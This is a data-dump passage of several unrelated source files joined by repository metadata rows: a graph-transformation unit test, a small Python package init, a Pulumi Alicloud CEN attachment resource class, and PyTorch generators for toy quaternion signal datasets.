def test_dequantize_with_axis(self, input_shape, scale_param_value, zero_param_value, target_shape, axis):
graph = build_graph(nodes1_attributes,
[('input', 'input_data'),
('input_data', 'dequantize'),
('dequantize', 'dequantize_data'),
('scale_param_dq', 'scale_param_dq_data'),
('zerop_param_dq', 'zerop_param_dq_data'),
('scale_param_dq_data', 'dequantize'),
('zerop_param_dq_data', 'dequantize'),
('dequantize_data', 'out'),
('out', 'out_data'),
('out_data', 'result'),
],
{'input_data': {'shape': input_shape},
'dequantize': {'axis': axis},
'scale_param_dq': {'shape': scale_param_value.shape,
'value': scale_param_value},
'scale_param_dq_data': {'shape': scale_param_value.shape,
'value': scale_param_value},
'zerop_param_dq': {'shape': zero_param_value.shape,
'value': zero_param_value},
'zerop_param_dq_data': {'shape': zero_param_value.shape,
'value': zero_param_value},
}, nodes_with_edges_only=True)
graph_ref = build_graph(nodes_ref_attributes,
[('input', 'input_data'),
('input_data', 'cast'),
('cast', 'cast_data'),
('cast_data', 'sub'),
('zerop_param_dq', 'zerop_param_dq_data'),
('zerop_param_dq_data', 'sub_reshape'),
('sub_reshape_const', 'sub_reshape_const_data'),
('sub_reshape_const_data', 'sub_reshape'),
('sub_reshape', 'sub_reshape_data'),
('sub_reshape_data', 'sub'),
('sub', 'sub_data'),
('sub_data', 'mul'),
('scale_param_dq', 'scale_param_dq_data'),
('scale_param_dq_data', 'mul_reshape'),
('mul_reshape_const', 'mul_reshape_const_data'),
('mul_reshape_const_data', 'mul_reshape'),
('mul_reshape', 'mul_reshape_data'),
('mul_reshape_data', 'mul'),
('mul', 'mul_data'),
('mul_data', 'out'),
('out', 'out_data'),
('out_data', 'result'),
],
{'input_data': {'shape': input_shape},
'scale_param_dq': {'shape': scale_param_value.shape,
'value': scale_param_value},
'scale_param_dq_data': {'shape': scale_param_value.shape,
'value': scale_param_value},
'zerop_param_dq': {'shape': zero_param_value.shape,
'value': zero_param_value},
'zerop_param_dq_data': {'shape': zero_param_value.shape,
'value': zero_param_value},
'sub_reshape_const_data': {'shape': target_shape.shape, 'value': target_shape},
'mul_reshape_const_data': {'shape': target_shape.shape, 'value': target_shape},
}, nodes_with_edges_only=True)
graph.stage = 'middle'
DequantizeLinearResolver().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
self.assertTrue(flag, resp)
| 57.243697
| 112
| 0.438784
| 1,333
| 13,624
| 4.177044
| 0.07952
| 0.072917
| 0.073276
| 0.057471
| 0.848599
| 0.831717
| 0.796516
| 0.766164
| 0.748922
| 0.748922
| 0
| 0.038466
| 0.39702
| 13,624
| 237
| 113
| 57.485232
| 0.639318
| 0.005652
| 0
| 0.72381
| 0
| 0
| 0.236267
| 0.012995
| 0
| 0
| 0
| 0
| 0.014286
| 1
| 0.014286
| false
| 0
| 0.033333
| 0
| 0.057143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
825729d7ada1eddd7737c57df63bdb56b3e0725b
| 105
|
py
|
Python
|
tinder_api/__init__.py
|
Tohaker/Tinder
|
23290cf3d6c23d1f35f5a192bc59d4b426ccbb66
|
[
"MIT"
] | 22
|
2020-05-20T08:34:44.000Z
|
2022-01-30T23:53:11.000Z
|
tinder_api/__init__.py
|
Tohaker/Tinder
|
23290cf3d6c23d1f35f5a192bc59d4b426ccbb66
|
[
"MIT"
] | 5
|
2020-07-06T20:28:54.000Z
|
2021-12-31T21:55:13.000Z
|
tinder_api/__init__.py
|
Tohaker/Tinder
|
23290cf3d6c23d1f35f5a192bc59d4b426ccbb66
|
[
"MIT"
] | 7
|
2020-09-15T03:17:57.000Z
|
2022-02-11T08:21:04.000Z
|
from tinder_api import api_endpoints
from tinder_api.api import Tinder_API
from tinder_api import helpers
| 35
| 37
| 0.885714
| 18
| 105
| 4.888889
| 0.333333
| 0.409091
| 0.443182
| 0.431818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104762
| 105
| 3
| 38
| 35
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
826028a73b1b2292efa32dd3dae414fbde49bf78
| 892
|
py
|
Python
|
__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 12
|
2019-08-20T06:27:15.000Z
|
2022-02-15T05:26:58.000Z
|
__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
OOXXXXOO/WSNet
|
b64aa7d80fe0a7aa8a440f2bb6df1f1e497a7620
|
[
"Apache-2.0"
] | 7
|
2019-08-26T03:31:26.000Z
|
2022-03-19T06:17:39.000Z
|
# **************************************************************************** #
# #
# ::: :::::::: #
# __init__.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: winshare <tanwenxuan@live.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/02/28 11:45:13 by winshare #+# #+# #
# Updated: 2020/02/28 11:50:11 by winshare ### ########.fr #
# #
# **************************************************************************** #
| 68.615385
| 80
| 0.113229
| 26
| 892
| 3.730769
| 0.653846
| 0.309278
| 0.164948
| 0.206186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077562
| 0.595291
| 892
| 12
| 81
| 74.333333
| 0.191136
| 0.933857
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82c9366d285e3bc855ac5f3f42562da471c00cd8
| 20,585
|
py
|
Python
|
sdk/python/pulumi_alicloud/cen/instance_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/cen/instance_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/cen/instance_attachment.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['InstanceAttachmentArgs', 'InstanceAttachment']
@pulumi.input_type
class InstanceAttachmentArgs:
def __init__(__self__, *,
child_instance_id: pulumi.Input[str],
child_instance_region_id: pulumi.Input[str],
child_instance_type: pulumi.Input[str],
instance_id: pulumi.Input[str],
cen_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_owner_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a InstanceAttachment resource.
:param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
:param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
:param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
:param pulumi.Input[str] instance_id: The ID of the CEN.
:param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
:param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attach a child instance of other account.
"""
pulumi.set(__self__, "child_instance_id", child_instance_id)
pulumi.set(__self__, "child_instance_region_id", child_instance_region_id)
pulumi.set(__self__, "child_instance_type", child_instance_type)
pulumi.set(__self__, "instance_id", instance_id)
if cen_owner_id is not None:
pulumi.set(__self__, "cen_owner_id", cen_owner_id)
if child_instance_owner_id is not None:
pulumi.set(__self__, "child_instance_owner_id", child_instance_owner_id)
@property
@pulumi.getter(name="childInstanceId")
def child_instance_id(self) -> pulumi.Input[str]:
"""
The ID of the child instance to attach.
"""
return pulumi.get(self, "child_instance_id")
@child_instance_id.setter
def child_instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "child_instance_id", value)
@property
@pulumi.getter(name="childInstanceRegionId")
def child_instance_region_id(self) -> pulumi.Input[str]:
"""
The region ID of the child instance to attach.
"""
return pulumi.get(self, "child_instance_region_id")
@child_instance_region_id.setter
def child_instance_region_id(self, value: pulumi.Input[str]):
pulumi.set(self, "child_instance_region_id", value)
@property
@pulumi.getter(name="childInstanceType")
def child_instance_type(self) -> pulumi.Input[str]:
"""
The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
"""
return pulumi.get(self, "child_instance_type")
@child_instance_type.setter
def child_instance_type(self, value: pulumi.Input[str]):
pulumi.set(self, "child_instance_type", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
"""
The ID of the CEN.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="cenOwnerId")
def cen_owner_id(self) -> Optional[pulumi.Input[int]]:
"""
The account ID to which the CEN instance belongs.
"""
return pulumi.get(self, "cen_owner_id")
@cen_owner_id.setter
def cen_owner_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cen_owner_id", value)
@property
@pulumi.getter(name="childInstanceOwnerId")
def child_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
"""
The uid of the child instance. Only used when attach a child instance of other account.
"""
return pulumi.get(self, "child_instance_owner_id")
@child_instance_owner_id.setter
def child_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "child_instance_owner_id", value)
@pulumi.input_type
class _InstanceAttachmentState:
def __init__(__self__, *,
cen_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_id: Optional[pulumi.Input[str]] = None,
child_instance_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_region_id: Optional[pulumi.Input[str]] = None,
child_instance_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering InstanceAttachment resources.
:param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
:param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
:param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attach a child instance of other account.
:param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
:param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
:param pulumi.Input[str] instance_id: The ID of the CEN.
:param pulumi.Input[str] status: The associating status of the network.
"""
if cen_owner_id is not None:
pulumi.set(__self__, "cen_owner_id", cen_owner_id)
if child_instance_id is not None:
pulumi.set(__self__, "child_instance_id", child_instance_id)
if child_instance_owner_id is not None:
pulumi.set(__self__, "child_instance_owner_id", child_instance_owner_id)
if child_instance_region_id is not None:
pulumi.set(__self__, "child_instance_region_id", child_instance_region_id)
if child_instance_type is not None:
pulumi.set(__self__, "child_instance_type", child_instance_type)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="cenOwnerId")
def cen_owner_id(self) -> Optional[pulumi.Input[int]]:
"""
The account ID to which the CEN instance belongs.
"""
return pulumi.get(self, "cen_owner_id")
@cen_owner_id.setter
def cen_owner_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cen_owner_id", value)
@property
@pulumi.getter(name="childInstanceId")
def child_instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the child instance to attach.
"""
return pulumi.get(self, "child_instance_id")
@child_instance_id.setter
def child_instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "child_instance_id", value)
@property
@pulumi.getter(name="childInstanceOwnerId")
def child_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
"""
The uid of the child instance. Only used when attach a child instance of other account.
"""
return pulumi.get(self, "child_instance_owner_id")
@child_instance_owner_id.setter
def child_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "child_instance_owner_id", value)
@property
@pulumi.getter(name="childInstanceRegionId")
def child_instance_region_id(self) -> Optional[pulumi.Input[str]]:
"""
The region ID of the child instance to attach.
"""
return pulumi.get(self, "child_instance_region_id")
@child_instance_region_id.setter
def child_instance_region_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "child_instance_region_id", value)
@property
@pulumi.getter(name="childInstanceType")
def child_instance_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
"""
return pulumi.get(self, "child_instance_type")
@child_instance_type.setter
def child_instance_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "child_instance_type", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the CEN.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The associating status of the network.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
class InstanceAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cen_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_id: Optional[pulumi.Input[str]] = None,
child_instance_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_region_id: Optional[pulumi.Input[str]] = None,
child_instance_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a CEN child instance attachment resource that associate the network(VPC, CCN, VBR) with the CEN instance.
->**NOTE:** Available in 1.42.0+
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "tf-testAccCenInstanceAttachmentBasic"
cen = alicloud.cen.Instance("cen", description="terraform01")
vpc = alicloud.vpc.Network("vpc", cidr_block="192.168.0.0/16")
foo = alicloud.cen.InstanceAttachment("foo",
instance_id=cen.id,
child_instance_id=vpc.id,
child_instance_type="VPC",
child_instance_region_id="cn-beijing")
```
## Import
CEN instance can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cen/instanceAttachment:InstanceAttachment example cen-m7i7pjmkon********:vpc-2ze2w07mcy9nz********:VPC:cn-beijing
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
:param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
:param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attach a child instance of other account.
:param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
:param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
:param pulumi.Input[str] instance_id: The ID of the CEN.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InstanceAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a CEN child instance attachment resource that associate the network(VPC, CCN, VBR) with the CEN instance.
->**NOTE:** Available in 1.42.0+
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "tf-testAccCenInstanceAttachmentBasic"
cen = alicloud.cen.Instance("cen", description="terraform01")
vpc = alicloud.vpc.Network("vpc", cidr_block="192.168.0.0/16")
foo = alicloud.cen.InstanceAttachment("foo",
instance_id=cen.id,
child_instance_id=vpc.id,
child_instance_type="VPC",
child_instance_region_id="cn-beijing")
```
## Import
CEN instance can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cen/instanceAttachment:InstanceAttachment example cen-m7i7pjmkon********:vpc-2ze2w07mcy9nz********:VPC:cn-beijing
```
:param str resource_name: The name of the resource.
:param InstanceAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InstanceAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cen_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_id: Optional[pulumi.Input[str]] = None,
child_instance_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_region_id: Optional[pulumi.Input[str]] = None,
child_instance_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InstanceAttachmentArgs.__new__(InstanceAttachmentArgs)
__props__.__dict__["cen_owner_id"] = cen_owner_id
if child_instance_id is None and not opts.urn:
raise TypeError("Missing required property 'child_instance_id'")
__props__.__dict__["child_instance_id"] = child_instance_id
__props__.__dict__["child_instance_owner_id"] = child_instance_owner_id
if child_instance_region_id is None and not opts.urn:
raise TypeError("Missing required property 'child_instance_region_id'")
__props__.__dict__["child_instance_region_id"] = child_instance_region_id
if child_instance_type is None and not opts.urn:
raise TypeError("Missing required property 'child_instance_type'")
__props__.__dict__["child_instance_type"] = child_instance_type
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["status"] = None
super(InstanceAttachment, __self__).__init__(
'alicloud:cen/instanceAttachment:InstanceAttachment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cen_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_id: Optional[pulumi.Input[str]] = None,
child_instance_owner_id: Optional[pulumi.Input[int]] = None,
child_instance_region_id: Optional[pulumi.Input[str]] = None,
child_instance_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None) -> 'InstanceAttachment':
"""
Get an existing InstanceAttachment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] cen_owner_id: The account ID to which the CEN instance belongs.
:param pulumi.Input[str] child_instance_id: The ID of the child instance to attach.
:param pulumi.Input[int] child_instance_owner_id: The uid of the child instance. Only used when attach a child instance of other account.
:param pulumi.Input[str] child_instance_region_id: The region ID of the child instance to attach.
:param pulumi.Input[str] child_instance_type: The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
:param pulumi.Input[str] instance_id: The ID of the CEN.
:param pulumi.Input[str] status: The associating status of the network.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InstanceAttachmentState.__new__(_InstanceAttachmentState)
__props__.__dict__["cen_owner_id"] = cen_owner_id
__props__.__dict__["child_instance_id"] = child_instance_id
__props__.__dict__["child_instance_owner_id"] = child_instance_owner_id
__props__.__dict__["child_instance_region_id"] = child_instance_region_id
__props__.__dict__["child_instance_type"] = child_instance_type
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["status"] = status
return InstanceAttachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="cenOwnerId")
def cen_owner_id(self) -> pulumi.Output[Optional[int]]:
"""
The account ID to which the CEN instance belongs.
"""
return pulumi.get(self, "cen_owner_id")
@property
@pulumi.getter(name="childInstanceId")
def child_instance_id(self) -> pulumi.Output[str]:
"""
The ID of the child instance to attach.
"""
return pulumi.get(self, "child_instance_id")
@property
@pulumi.getter(name="childInstanceOwnerId")
def child_instance_owner_id(self) -> pulumi.Output[int]:
"""
The uid of the child instance. Only used when attach a child instance of other account.
"""
return pulumi.get(self, "child_instance_owner_id")
@property
@pulumi.getter(name="childInstanceRegionId")
def child_instance_region_id(self) -> pulumi.Output[str]:
"""
The region ID of the child instance to attach.
"""
return pulumi.get(self, "child_instance_region_id")
@property
@pulumi.getter(name="childInstanceType")
def child_instance_type(self) -> pulumi.Output[str]:
"""
The type of the associated network. Valid values: `VPC`, `VBR` and `CCN`.
"""
return pulumi.get(self, "child_instance_type")
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[str]:
"""
The ID of the CEN.
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The associating status of the network.
"""
return pulumi.get(self, "status")
| 43.155136
| 147
| 0.655332
| 2,533
| 20,585
| 5.033557
| 0.072246
| 0.166196
| 0.065882
| 0.056
| 0.860078
| 0.841333
| 0.830824
| 0.821255
| 0.803451
| 0.780706
| 0
| 0.003022
| 0.244547
| 20,585
| 476
| 148
| 43.245798
| 0.816861
| 0.304348
| 0
| 0.646825
| 1
| 0
| 0.131139
| 0.046208
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15873
| false
| 0.003968
| 0.019841
| 0
| 0.27381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d6432490965bf4ddf7906c4dc54c18f4d5aec2a
| 5,667
|
py
|
Python
|
entropy/datasets.py
|
eleGAN23/QVAE
|
7315aae7a03637dcc2e2226644d591c4f034527e
|
[
"MIT"
] | 10
|
2021-03-25T11:56:37.000Z
|
2021-12-25T19:40:29.000Z
|
entropy/datasets.py
|
eleGAN23/QVAE
|
7315aae7a03637dcc2e2226644d591c4f034527e
|
[
"MIT"
] | null | null | null |
entropy/datasets.py
|
eleGAN23/QVAE
|
7315aae7a03637dcc2e2226644d591c4f034527e
|
[
"MIT"
] | 1
|
2021-12-28T10:39:57.000Z
|
2021-12-28T10:39:57.000Z
|
import torch
import random
import numpy as np
from scipy.signal import lfilter
### Build dataset for toy example #1
def QProper_signals1(len_train, len_val, len_test, n):
# Generate Q-Proper signal for train
train_dataset = torch.zeros((len_train, n * 4))
for i in range(len_train):
q0 = torch.randn(n) + 0.03
q1 = torch.randn(n) + 0.03
q2 = torch.randn(n) + 0.03
q3 = torch.randn(n) + 0.03
q = torch.cat([q0, q1, q2, q3], dim=0)
train_dataset[i, :] = q
train_dataset / torch.max(train_dataset)
# Build validation set
val_dataset = torch.zeros((len_val, n * 4))
for i in range(len_val):
q0 = torch.randn(n) + 0.03
q1 = torch.randn(n) + 0.03
q2 = torch.randn(n) + 0.03
q3 = torch.randn(n) + 0.03
q = torch.cat([q0, q1, q2, q3], dim=0)
val_dataset[i, :] = q
val_dataset / torch.max(val_dataset)
# Build test set
test_dataset = torch.zeros((len_test, n * 4))
for i in range(len_test):
q0 = torch.randn(n) + 0.03
q1 = torch.randn(n) + 0.03
q2 = torch.randn(n) + 0.03
q3 = torch.randn(n) + 0.03
q = torch.cat([q0, q1, q2, q3], dim=0)
test_dataset[i, :] = q
test_dataset / torch.max(test_dataset)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=len(train_dataset)
)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
test_loader = torch.utils.data.DataLoader(
test_dataset, batch_size=len(test_dataset)
)
return train_loader, val_loader, test_loader
### Build dataset for toy example #1
def QProper_signals2(len_train, len_val, len_test, n):
# Generate Q-Proper signal for train
b = 0.5
train_dataset = torch.FloatTensor(
lfilter([np.sqrt(1-b**2)], [1 -b], (1/(np.sqrt(4)))*(np.random.randn(len_train,4)))
)
# Build validation set
val_dataset = torch.FloatTensor(
lfilter([np.sqrt(1-b**2)], [1 -b], (1/(np.sqrt(4)))*(np.random.randn(len_val,4)))
)
# Build test set
test_dataset = torch.FloatTensor(
lfilter([np.sqrt(1-b**2)], [1 -b], (1/(np.sqrt(4)))*(np.random.randn(len_test,4)))
)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=len(train_dataset)
)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
test_loader = torch.utils.data.DataLoader(
test_dataset, batch_size=len(test_dataset)
)
return train_loader, val_loader, test_loader
def QImproper_signals1(len_train, len_val, len_test, n):
w = torch.randn(len_train, 1) + 0.03
q0 = torch.FloatTensor([0]).view(1, 1)
q1 = torch.randn(1).view(1, 1)
q2 = torch.randn(1).view(1, 1)
q3 = torch.randn(1).view(1, 1)
c = torch.cat([q0, q1, q2, q3], dim=1)
a = torch.exp(c)
q = a*w
# q /= torch.max(q)
train_dataset = q
w = torch.randn(len_val, 1) + 0.03
q0 = torch.FloatTensor([0]).view(1, 1)
q1 = torch.randn(1).view(1, 1)
q2 = torch.randn(1).view(1, 1)
q3 = torch.randn(1).view(1, 1)
c = torch.cat([q0, q1, q2, q3], dim=1)
a = torch.exp(c)
q = a*w
# q /= torch.max(q)
val_dataset = q
w = torch.randn(len_test, 1) + 0.03
q0 = torch.FloatTensor([0]).view(1, 1)
q1 = torch.randn(1).view(1, 1)
q2 = torch.randn(1).view(1, 1)
q3 = torch.randn(1).view(1, 1)
c = torch.cat([q0, q1, q2, q3], dim=1)
a = torch.exp(c)
q = a*w
# q /= torch.max(q)
test_dataset = q
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=len(train_dataset)
)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
test_loader = torch.utils.data.DataLoader(
test_dataset, batch_size=len(test_dataset)
)
return train_loader, val_loader, test_loader
def QImproper_signals2(len_train, len_val, len_test, n):
w = np.random.randn(len_train, 1) + 0.03
w = w / np.max(w)
b = [0.75, 0.78, 0.82, 0.85]
q0 = torch.FloatTensor(lfilter([np.sqrt(1 - b[0] ** 2)], [1 - b[0]], w))
q1 = torch.FloatTensor(lfilter([np.sqrt(1 - b[1] ** 2)], [1 - b[1]], w))
q2 = torch.FloatTensor(lfilter([np.sqrt(1 - b[2] ** 2)], [1 - b[2]], w))
q3 = torch.FloatTensor(lfilter([np.sqrt(1 - b[3] ** 2)], [1 - b[3]], w))
train_dataset = torch.cat([q0, q1, q2, q3], dim=1)
w = np.random.randn(len_val, 1) + 0.03
w = w / np.max(w)
q0 = torch.FloatTensor(lfilter([np.sqrt(1 - b[0] ** 2)], [1 - b[0]], w))
q1 = torch.FloatTensor(lfilter([np.sqrt(1 - b[1] ** 2)], [1 - b[1]], w))
q2 = torch.FloatTensor(lfilter([np.sqrt(1 - b[2] ** 2)], [1 - b[2]], w))
q3 = torch.FloatTensor(lfilter([np.sqrt(1 - b[3] ** 2)], [1 - b[3]], w))
val_dataset = torch.cat([q0, q1, q2, q3], dim=1)
w = np.random.randn(len_test, 1) + 0.03
w = w / np.max(w)
q0 = torch.FloatTensor(lfilter([np.sqrt(1 - b[0] ** 2)], [1 - b[0]], w))
q1 = torch.FloatTensor(lfilter([np.sqrt(1 - b[1] ** 2)], [1 - b[1]], w))
q2 = torch.FloatTensor(lfilter([np.sqrt(1 - b[2] ** 2)], [1 - b[2]], w))
q3 = torch.FloatTensor(lfilter([np.sqrt(1 - b[3] ** 2)], [1 - b[3]], w))
test_dataset = torch.cat([q0, q1, q2, q3], dim=1)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=len(train_dataset)
)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=len(val_dataset))
test_loader = torch.utils.data.DataLoader(
test_dataset, batch_size=len(test_dataset)
)
return train_loader, val_loader, test_loader
| 34.981481
| 91
| 0.596083
| 939
| 5,667
| 3.478168
| 0.072417
| 0.018371
| 0.105634
| 0.114819
| 0.901715
| 0.895591
| 0.839865
| 0.825168
| 0.775566
| 0.767299
| 0
| 0.063586
| 0.228516
| 5,667
| 162
| 92
| 34.981481
| 0.68344
| 0.045703
| 0
| 0.595238
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
